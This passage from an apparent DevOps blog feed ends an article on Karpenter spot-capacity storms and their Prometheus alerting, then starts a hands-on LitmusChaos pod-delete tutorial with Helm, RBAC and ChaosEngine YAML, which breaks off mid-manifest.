        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-workaround-3-a-tiny-external-controller"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>There is no upstream-blessed operator for spot-storm detection. Some teams build a small controller that watches Karpenter&#39;s error metrics and patches the spot NodePool to temporarily remove <code>spot</code> from <code>karpenter.sh/capacity-type</code> when interruption rates spike. The shape is straightforward:</p>
<pre><code class="hljs language-text">1. Watch karpenter_cloudprovider_errors_total{error=~&quot;Insufficient.*|Unfulfillable.*&quot;}
2. If rate &gt; threshold for N minutes, patch the spot NodePool:
     requirements:
       - key: karpenter.sh/capacity-type
         operator: In
         values: [&quot;on-demand&quot;]
3. After M minutes of error-rate quiet, revert.
</code></pre><p>This is not a substitute for workarounds 1 and 2. It is what you build when narrow-constraint workloads (GPU, instance-pinned) still need a fallback path. Treat it as an internal tool, not a product.</p>
<h2 id="h2-metrics-that-catch-the-storm" class="group relative scroll-mt-24">
        <a href="#h2-metrics-that-catch-the-storm" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Metrics that catch the storm
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-metrics-that-catch-the-storm"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Karpenter exposes a useful set of cloudprovider metrics. The ones that matter during a storm:</p>
<ul>
<li><code>karpenter_cloudprovider_errors_total</code>: label <code>error</code> carries <code>InsufficientInstanceCapacity</code>, <code>UnfulfillableCapacity</code>, <code>MaxSpotInstanceCountExceeded</code>. A spike is the storm starting.</li>
<li><code>karpenter_cloudprovider_instance_type_offering_available</code>: gauge per <code>instance_type</code> / <code>capacity_type</code> / <code>zone</code>. Watch the sum drop.</li>
<li><code>karpenter_nodeclaims_created_total</code>, <code>karpenter_nodeclaims_terminated_total</code>, <code>karpenter_nodeclaims_disrupted_total{reason=&quot;interruption&quot;}</code>: when <code>disrupted{reason=interruption}</code> rate approaches <code>created</code> rate, you are churning.</li>
<li><code>karpenter_interruption_received_messages_total{message_type=&quot;SpotInterruptionKind&quot;}</code>: spot 2-minute warnings from the SQS queue.</li>
<li><code>karpenter_voluntary_disruption_decisions_total</code>, <code>karpenter_voluntary_disruption_queue_failures_total</code>.</li>
</ul>
<p>A working Prometheus alert that has caught real storms in production:</p>
<pre><code class="hljs language-yaml"><span class="hljs-bullet">-</span> <span class="hljs-attr">alert:</span> <span class="hljs-string">KarpenterSpotStorm</span>
  <span class="hljs-attr">expr:</span> <span class="hljs-string">|
    sum(rate(karpenter_nodeclaims_disrupted_total{reason=&quot;interruption&quot;}[10m])) &gt; 0.05
    and
    sum(rate(karpenter_cloudprovider_errors_total{error=~&quot;InsufficientInstanceCapacity|UnfulfillableCapacity&quot;}[10m])) &gt; 0.1
</span>  <span class="hljs-attr">for:</span> <span class="hljs-string">10m</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">severity:</span> <span class="hljs-string">warning</span>
  <span class="hljs-attr">annotations:</span>
    <span class="hljs-attr">summary:</span> <span class="hljs-string">&quot;Karpenter is looping on spot capacity errors&quot;</span>
    <span class="hljs-attr">description:</span> <span class="hljs-string">|
      Spot interruption rate is above 0.05/s AND CreateFleet capacity
      errors are above 0.1/s for 10m. The 3-minute offering TTL is
      probably looping. Consider temporarily widening the on-demand
      NodePool weight or removing &#x27;spot&#x27; from the capacity-type
      requirement until the region clears.</span>
</code></pre><p>The <code>AND</code> matters. Either signal alone is noisy. Together they describe the loop specifically.</p>
<h2 id="h2-known-bugs-in-the-metrics-themselves" class="group relative scroll-mt-24">
        <a href="#h2-known-bugs-in-the-metrics-themselves" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Known bugs in the metrics themselves
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-known-bugs-in-the-metrics-themselves"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A few sharp edges worth knowing about before you build a dashboard on these:</p>
<ul>
<li><code>karpenter_interruption_received_messages_total{message_type=&quot;SpotInterruptionKind&quot;}</code> includes account-wide spot interruption events, not just Karpenter-managed instances. It will not match <code>karpenter_nodeclaims_terminated_total{reason=&quot;interruption&quot;}</code>. Issue <code>aws/karpenter-provider-aws#6376</code> is still open as of writing.</li>
<li>Earlier versions of Karpenter (around v0.37.0) incremented <code>karpenter_interruption_received_messages_total</code> by 2 per event. The fix shipped, but worth verifying against the cluster version you actually run. Issue <code>#6531</code>.</li>
<li>Metrics scraped from the standby (non-leader) replica return zeros or stale values, so scraping the Service can yield phantom drops. Issue <code>kubernetes-sigs/karpenter#1450</code>. Scrape the Pod, not the Service, or scrape both and reconcile.</li>
<li><code>karpenter_cloudprovider_errors_total</code> does not carry a <code>nodepool</code> label. You cannot alert directly on &quot;the spot NodePool is storming.&quot; Infer it from the <code>capacity_type</code> label if your provider build labels it, and confirm against your version. Open ask in <code>#8224</code>.</li>
</ul>
<h2 id="h2-what-to-expect-from-the-roadmap" class="group relative scroll-mt-24">
        <a href="#h2-what-to-expect-from-the-roadmap" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What to expect from the roadmap
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-to-expect-from-the-roadmap"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>As of writing, none of the obvious &quot;automatic fallback&quot; feature requests are scheduled. Issue <code>#8298</code> was closed without implementation. Issue <code>#2275</code> was closed as working-as-intended in January 2026. The configurable cache TTL and NodePool-aware metrics in <code>#8224</code> are still open with no design doc attached.</p>
<p>This is not because the maintainers don&#39;t care. It is because the architectural answer they are committed to (wide requirements plus <code>minValues</code> plus weighted NodePools) covers most cases. The cases it does not cover (narrow-constraint workloads, regional storms) are real, but rare enough that the project has not prioritized building the fallback machinery.</p>
<p>Practically, this means the production posture is yours to design. Plan for the storm.</p>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-summary"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Karpenter does not auto-fail-over from spot to on-demand. The 3-minute offering TTL plus per-offering retry semantics produce a tight loop during regional capacity storms that can keep workloads Pending for hours while on-demand capacity sits idle. The maintainers consider this intentional and recommend wide instance-type requirements plus weighted NodePools as the answer.</p>
<p>In production, run:</p>
<ol>
<li>A spot NodePool with at least six instance families and <code>minValues: 6</code> on family, plus <code>minValues</code> on CPU.</li>
<li>A separate on-demand NodePool with a <code>karpenter.sh/capacity-type=on-demand:NoSchedule</code> taint so fallback is opt-in.</li>
<li>A Prometheus alert that pairs <code>karpenter_nodeclaims_disrupted_total{reason=&quot;interruption&quot;}</code> rate with <code>karpenter_cloudprovider_errors_total</code> rate, firing only when both spike together.</li>
<li>An internal runbook that documents how to temporarily remove <code>spot</code> from the spot NodePool&#39;s <code>karpenter.sh/capacity-type</code> values during a storm, since Karpenter will not do it for you.</li>
</ol>
<p>The smart spot handler is still the right default. Just don&#39;t trust it to handle the day spot capacity stops being a thing.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Running Your First Chaos Engineering Experiment with Litmus]]></title>
      <link>https://devops-daily.com/posts/running-first-chaos-engineering-experiment-litmus</link>
      <description><![CDATA[A hands-on walkthrough of installing LitmusChaos on Kubernetes, killing pods on purpose, and watching whether your app actually recovers. Real YAML, real output, no theory.]]></description>
      <pubDate>Mon, 18 May 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/running-first-chaos-engineering-experiment-litmus</guid>
      <category><![CDATA[Kubernetes]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[chaos-engineering]]></category><category><![CDATA[litmus]]></category><category><![CDATA[kubernetes]]></category><category><![CDATA[resilience]]></category><category><![CDATA[sre]]></category>
      <content:encoded><![CDATA[<p>Your deployment has three replicas. Your readiness probe is set. Your HPA is configured. On paper, you can lose a pod and nothing should happen. But you have never actually tested it, because the only time pods die in production is at 3am, and by then it is too late to find out the readiness probe was checking the wrong port.</p>
<p>That is the gap chaos engineering fills. You break things on purpose during business hours, with a hypothesis and a stop button, and you learn what actually happens before a node failure or a kernel OOM teaches you the hard way.</p>
<p>This post walks through running your first experiment with LitmusChaos: install it, target a real deployment, kill a pod, and watch whether the system recovers like you expect.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Install Litmus with Helm, label your target deployment, apply a <code>ChaosExperiment</code> and <code>ChaosEngine</code> for <code>pod-delete</code>, and watch the <code>ChaosResult</code> to see if your app passed. The whole loop takes about 20 minutes on a fresh cluster.</p>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>A Kubernetes cluster you do not mind poking. A local <code>kind</code> or <code>minikube</code> cluster is fine for the first run.</li>
<li><code>kubectl</code> configured and pointing at that cluster.</li>
<li>Helm 3.x installed.</li>
<li>A workload to break. The post uses <code>nginx</code> with three replicas, but any Deployment will do.</li>
</ul>
<p>If you do not have a cluster handy, spin one up with <code>kind</code>:</p>
<pre><code class="hljs language-bash">kind create cluster --name chaos-lab
kubectl cluster-info --context kind-chaos-lab
</code></pre><h2 id="h2-what-litmus-actually-is" class="group relative scroll-mt-24">
        <a href="#h2-what-litmus-actually-is" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What Litmus Actually Is
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-litmus-actually-is"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Litmus is a Kubernetes-native chaos platform. You write experiments as YAML, apply them with <code>kubectl</code>, and Litmus runs a chaos runner pod that injects the failure (kill a pod, hog CPU, drop network packets) against a target you select with labels.</p>
<p>Three resources matter:</p>
<ul>
<li><strong>ChaosExperiment</strong>: the definition of the fault. What to inject, with what defaults. Think of it as a function.</li>
<li><strong>ChaosEngine</strong>: the invocation. Which experiment, against which target, with what arguments. This is the thing you apply when you want chaos to start.</li>
<li><strong>ChaosResult</strong>: the verdict. Pass or fail, written by Litmus after the experiment runs.</li>
</ul>
<p>You install the platform once. You ship experiments per fault type. You apply engines per drill.</p>
<h2 id="h2-install-litmus" class="group relative scroll-mt-24">
        <a href="#h2-install-litmus" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Install Litmus
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-install-litmus"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Add the Helm repo and install the control plane into its own namespace:</p>
<pre><code class="hljs language-bash">kubectl create namespace litmus

helm repo add litmuschaos https://litmuschaos.github.io/litmus-helm/
helm repo update

helm install chaos litmuschaos/litmus \
  --namespace=litmus \
  --<span class="hljs-built_in">set</span> portal.frontend.service.type=ClusterIP
</code></pre><p>Wait for the pods to come up:</p>
<pre><code class="hljs language-bash">kubectl -n litmus get pods
</code></pre><p>You should see something like this:</p>
<pre><code class="hljs language-text">NAME                                     READY   STATUS    RESTARTS   AGE
chaos-litmus-frontend-7c8f6b9c4d-x2k8m   1/1     Running   0          2m
chaos-litmus-server-6b5d4f8c9-pq7nz      1/1     Running   0          2m
chaos-mongo-0                            1/1     Running   0          2m
</code></pre><p>The control plane is the optional ChaosCenter UI. The actual experiment runner is the chaos operator, which you install next.</p>
<h2 id="h2-install-the-chaos-operator-and-experiments" class="group relative scroll-mt-24">
        <a href="#h2-install-the-chaos-operator-and-experiments" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Install the Chaos Operator and Experiments
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-install-the-chaos-operator-and-experiments"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The operator watches for <code>ChaosEngine</code> resources and runs them. The experiment catalog ships separately so you can pick the faults you want.</p>
<pre><code class="hljs language-bash">kubectl apply -f https://litmuschaos.github.io/litmus/3.0.0/litmus-k8s-3.0.0.yaml
</code></pre><p>Check that the operator is healthy:</p>
<pre><code class="hljs language-bash">kubectl -n litmus get pods -l app.kubernetes.io/component=operator
</code></pre><p>Then load the generic experiment pack (pod-delete, container-kill, pod-cpu-hog, pod-memory-hog, and more) into the namespace where your target lives. For this walkthrough, that namespace is <code>default</code>:</p>
<pre><code class="hljs language-bash">kubectl apply -f https://hub.litmuschaos.io/api/chaos/3.0.0?file=charts/generic/experiments.yaml -n default
</code></pre><p>Verify the experiments are registered:</p>
<pre><code class="hljs language-bash">kubectl get chaosexperiments -n default
</code></pre><pre><code class="hljs language-text">NAME                AGE
pod-delete          12s
container-kill      12s
pod-cpu-hog         12s
pod-memory-hog      12s
pod-network-loss    12s
</code></pre><h2 id="h2-deploy-something-to-break" class="group relative scroll-mt-24">
        <a href="#h2-deploy-something-to-break" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Deploy Something to Break
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-deploy-something-to-break"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>If you do not already have a target, deploy a small nginx with three replicas:</p>
<pre><code class="hljs language-bash">kubectl create deployment web --image=nginx:1.27 --replicas=3
kubectl expose deployment web --port=80
kubectl label deployment web app=web
</code></pre><p>Confirm the pods are running:</p>
<pre><code class="hljs language-bash">kubectl get pods -l app=web
</code></pre><pre><code class="hljs language-text">NAME                   READY   STATUS    RESTARTS   AGE
web-6c8b9d7f4-2lhmn    1/1     Running   0          30s
web-6c8b9d7f4-7gxqp    1/1     Running   0          30s
web-6c8b9d7f4-rk9vx    1/1     Running   0          30s
</code></pre><h2 id="h2-give-litmus-permission-to-cause-chaos" class="group relative scroll-mt-24">
        <a href="#h2-give-litmus-permission-to-cause-chaos" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Give Litmus Permission to Cause Chaos
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-give-litmus-permission-to-cause-chaos"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Litmus runs experiments under a ServiceAccount with a tightly scoped Role. Without it, the experiment pod cannot touch your workload. Apply this RBAC into the <code>default</code> namespace:</p>
<pre><code class="hljs language-yaml"><span class="hljs-comment"># litmus-rbac.yaml</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ServiceAccount</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete-sa</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">default</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete-sa</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">rbac.authorization.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Role</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete-sa</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">default</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete-sa</span>
<span class="hljs-attr">rules:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">apiGroups:</span> [<span class="hljs-string">&quot;&quot;</span>]
    <span class="hljs-attr">resources:</span> [<span class="hljs-string">&quot;pods&quot;</span>, <span class="hljs-string">&quot;events&quot;</span>]
    <span class="hljs-attr">verbs:</span> [<span class="hljs-string">&quot;create&quot;</span>, <span class="hljs-string">&quot;list&quot;</span>, <span class="hljs-string">&quot;get&quot;</span>, <span class="hljs-string">&quot;patch&quot;</span>, <span class="hljs-string">&quot;update&quot;</span>, <span class="hljs-string">&quot;delete&quot;</span>, <span class="hljs-string">&quot;deletecollection&quot;</span>]
  <span class="hljs-bullet">-</span> <span class="hljs-attr">apiGroups:</span> [<span class="hljs-string">&quot;&quot;</span>]
    <span class="hljs-attr">resources:</span> [<span class="hljs-string">&quot;pods/log&quot;</span>, <span class="hljs-string">&quot;replicationcontrollers&quot;</span>, <span class="hljs-string">&quot;configmaps&quot;</span>, <span class="hljs-string">&quot;services&quot;</span>]
    <span class="hljs-attr">verbs:</span> [<span class="hljs-string">&quot;get&quot;</span>, <span class="hljs-string">&quot;list&quot;</span>]
  <span class="hljs-bullet">-</span> <span class="hljs-attr">apiGroups:</span> [<span class="hljs-string">&quot;apps&quot;</span>]
    <span class="hljs-attr">resources:</span> [<span class="hljs-string">&quot;deployments&quot;</span>, <span class="hljs-string">&quot;statefulsets&quot;</span>, <span class="hljs-string">&quot;daemonsets&quot;</span>, <span class="hljs-string">&quot;replicasets&quot;</span>]
    <span class="hljs-attr">verbs:</span> [<span class="hljs-string">&quot;list&quot;</span>, <span class="hljs-string">&quot;get&quot;</span>]
  <span class="hljs-bullet">-</span> <span class="hljs-attr">apiGroups:</span> [<span class="hljs-string">&quot;litmuschaos.io&quot;</span>]
    <span class="hljs-attr">resources:</span> [<span class="hljs-string">&quot;chaosengines&quot;</span>, <span class="hljs-string">&quot;chaosexperiments&quot;</span>, <span class="hljs-string">&quot;chaosresults&quot;</span>]
    <span class="hljs-attr">verbs:</span> [<span class="hljs-string">&quot;create&quot;</span>, <span class="hljs-string">&quot;list&quot;</span>, <span class="hljs-string">&quot;get&quot;</span>, <span class="hljs-string">&quot;patch&quot;</span>, <span class="hljs-string">&quot;update&quot;</span>, <span class="hljs-string">&quot;delete&quot;</span>]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">rbac.authorization.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">RoleBinding</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete-sa</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">default</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete-sa</span>
<span class="hljs-attr">roleRef:</span>
  <span class="hljs-attr">apiGroup:</span> <span class="hljs-string">rbac.authorization.k8s.io</span>
  <span class="hljs-attr">kind:</span> <span class="hljs-string">Role</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete-sa</span>
<span class="hljs-attr">subjects:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">kind:</span> <span class="hljs-string">ServiceAccount</span>
    <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete-sa</span>
    <span class="hljs-attr">namespace:</span> <span class="hljs-string">default</span>
</code></pre><pre><code class="hljs language-bash">kubectl apply -f litmus-rbac.yaml
</code></pre><h2 id="h2-write-the-experiment" class="group relative scroll-mt-24">
        <a href="#h2-write-the-experiment" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Write the Experiment
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-write-the-experiment"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Time for the actual fault. This <code>ChaosEngine</code> targets the <code>web</code> deployment, picks one pod at random every 10 seconds for 30 seconds total, and kills it. The deployment controller should immediately create replacements.</p>
<pre><code class="hljs language-yaml"><span class="hljs-comment"># pod-delete-engine.yaml</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">litmuschaos.io/v1alpha1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ChaosEngine</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">web-pod-delete</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">default</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">appinfo:</span>
    <span class="hljs-attr">appns:</span> <span class="hljs-string">default</span>
    <span class="hljs-attr">applabel:</span> <span class="hljs-string">&#x27;app=web&#x27;</span>
    <span class="hljs-attr">appkind:</span> <span class="hljs-string">&#x27;deployment&#x27;</span>
  <span class="hljs-attr">chaosServiceAccount:</span> <span class="hljs-string">pod-delete-sa</span>
  <span class="hljs-attr">engineState:</span> <span class="hljs-string">&#x27;active&#x27;</span>
  <span class="hljs-attr">experiments:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete</span>
      <span class="hljs-attr">spec:</span>
        <span class="hljs-attr">components:</span>
          <span class="hljs-attr">env:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">TOTAL_CHAOS_DURATION</span>
              <span class="hljs-attr">value:</span> <span class="hljs-string">&#x27;30&#x27;</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">CHAOS_INTERVAL</span>
              <span class="hljs-attr">value:</span> <span class="hljs-string">&#x27;10&#x27;</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">FORCE</span>
              <span class="hljs-attr">value:</span> <span class="hljs-string">&#x27;false&#x27;</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">PODS_AFFECTED_PERC</span>
